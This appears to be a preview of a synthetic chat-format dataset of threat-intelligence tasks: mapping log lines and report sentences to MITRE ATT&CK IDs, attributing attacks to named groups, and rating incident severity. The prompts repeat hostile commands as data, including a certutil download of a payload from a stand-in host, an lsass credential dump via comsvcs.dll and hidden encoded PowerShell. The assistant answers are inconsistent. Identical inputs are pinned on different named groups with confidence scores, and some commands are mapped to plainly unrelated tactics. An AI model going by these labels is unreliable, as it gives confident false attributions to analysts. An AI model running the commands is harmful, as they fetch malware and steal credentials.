messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BRONZE BUTLER has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-HGXX9S2SQZ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Impact, Collection", "role": "user" }, { "conte...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Animate – Create a process from the tainted section of memory and initiate execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055.013\", \"T1055\"]}", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.0.138.13", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0043\"], \"techniq...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.179.223.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0009\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.127.94.224", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0005\", \"TA0009\"], \"techniques\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-O2AG4BOQUW)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.3.88.136", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1021.0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-X76JZGMPSS)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Credential Access, Defense Evasion", "role": "user" ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"]...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.40.238.118", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0040\", \"TA0004\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3696 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confide...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: There have been notable incidents where internal spearphishing has been used.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1534\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-S1U3A0Y3YN)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Execution", "role": "user" }, { "content": "{\"seve...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Empire can find information about processes running on local and remote systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2725 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-0D23GTZ5FP)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Discovery, Execution", "role": "user" }, { "c...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Some strings are obfuscated with XOR x56", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattere...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 511 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.163.71.110", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.40.131.159", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-4GSP8DH16X)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Defense Evasion, Reconnaissance", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-E5141BDOFX)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Lateral Movement, Exfiltration", "role": "user" }, { "c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Remsec also disguised malicious modules using similar filenames as custom network encryption software on victims.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.69.2.127", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1069 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.180.171.99", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0004\", \"TA0043\"], ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-FG7LEWWK6Z)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Reconnaissance, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-VDWZ11UULX)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Credential Access, Reconnaissance, Discovery", "role": "user" }, {...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Deletion of all registry keys associated with the extraction of the SFX RAR Deletion of the User Assist Key entries related to applications that have been recently executed Deletion of all registry keys relating to s...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: For comparison, if we were to inspect Fysbis “RemoteShell” associated strings in one of the stripped variants, we would only see the following: Figure 3: Sofacy Fysbis stripped binary string references to RemoteShell capa...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.140.3.88", "role": "user" }, { "content": "{\"tactics\": [\"TA004...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assis...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-RM58XEDPXH)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Collection", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-CHC51NPRSN)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Reconnaissance", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-IJ22YYU7X3)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Hi...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the origina...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles,", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Tools such as PsExec and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.0...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: On Windows and Linux, these system processes are referred to as services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-N5O6Q8XW6K)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access, Lateral Movement", "role": "user" }, { "content": "{...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: AuditCred can search through folders and files on the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: pwdump can be used to dump credentials from the SAM.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.002\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Linfo creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.169.106.143", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typh...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HiddenWasp creates a user account as a means to provide initial persistence to the compromised machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1136\", \"T1136.001\"]}", "role":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-L7HC7SEX1F)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Discovery", "role": "user" }, { "content": "{\"sev...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1449 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.101.185.213", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0005\"]...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BabyShark has used cmd.exe to execute commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-B8JRN3SG1J)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Defense Evasion, Collection", "role": "user" }, { "co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Microsoft Office contains templates that are part of common Office applications and are used to customize styles.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055.012\", \"T1055\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-5D2K69AKKC)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Initial Access", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1135 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-L7523YLPHQ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Command and Control", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2653 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).", "role": "user" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1696 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-NDGSL4A334)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Initial Access", "role": "user" }, { "co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-PHO3XHMIVW)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement, Execution, Defense Evasion", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1187\"]}", "role": "a...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: FIVEHANDS can receive a command line argument to limit file encryption to specified directories.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059\"]}", "role": "assista...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.33.68.156", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\", \"TA0043\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-VUIJOFHCOO)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence, Command and Control, Discovery", "role": "user" }, { "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.51.77.137", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.168.45.95", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T149...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1120 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-RHLCC87B4T)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critica...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition.", "role": "user" }, { "content": "{\"tac...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 948 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-XB9Y0ZT27E)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-0Z2FRZKFLS)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Privilege Escalation, Defense Evasion", "role": "user" ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Dragonfly has collected open source information to identify relationships between organizations for targeting purposes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T15...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.194.63.3", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Green Lambert can use proxies for C2 traffic.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"con...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1323 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.157.190.157", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3213 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidenc...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.65.248.250", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"...